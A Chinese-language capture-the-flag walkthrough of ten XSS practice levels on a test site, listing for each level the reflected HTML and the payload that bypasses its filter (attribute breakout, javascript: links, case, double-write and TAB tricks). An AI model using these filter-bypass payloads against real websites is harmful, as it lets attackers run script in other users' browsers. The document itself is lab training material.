一
http://test.ctf8.com/level1.php?name=<script>alert(1)</script>
二
输入<script>alert(1)</script>
查看源码看到<input name=keyword value="<script>alert(1)<script>">
构造
" onclick="alert(1)
三
输入" onclick="alert(1)
查看源码看到<input name=keyword value='" onclick="alert(1)'>
双引号进行了实体编码,并且这里是单引号闭合
构造
' onclick='alert(1)
单引号未被实体编码
四
查看源码得到
<input name=keyword value="">
构造
" onclick="alert(1)
五
查看源码得到
<input name=keyword value="find a way out!">
输入" onclick="alert(1)
查看源码看到<input name=keyword value="" o_nclick="alert(1)">
onclick变成了o_nclick
构造"><a href="javascript:alert(1)
六
查看源码得到<input name=keyword value="break it out!">
输入
"><a href="javascript:alert(1)
查看源码得到
<input name=keyword value=""><a hr_ef="javascript:alert(1)">
href变成了hr_ef
试试大小写绕过
"><a hrEf="javascript:alert(1)
七
输入"><a hrEf="javascript:alert(1)
<input name=keyword value=""><a ="java:alert(1)">
删除了script和href
双写绕过试试
构造
"><a hhrefref="javasscriptcript:alert(1)
八
输入框的内容会变成a的href
<a href="nice try!">友情链接</a>
输入javascript:alert(1)
查看源码得到
<a href="javascr_ipt:alert(1)">友情链接</a>
script变成scr_ipt
大小写绕过试试,会自动变成小写
使用TAB绕过(中间的是TAB)
javas cript:alert(1)
九
查看源码<a href="您的链接不合法?有没有!">
一般链接都是以http://
开头
构造javasc ript:alert(/xss/);//http://
十
查看源码
<input name="t_link" value="" type="hidden">
<input name="t_history" value="" type="hidden">
<input name="t_sort" value="" type="hidden">
使用F12,修改一个输入框为
<input name="t_link" value="" type="text" onclick="alert(1)">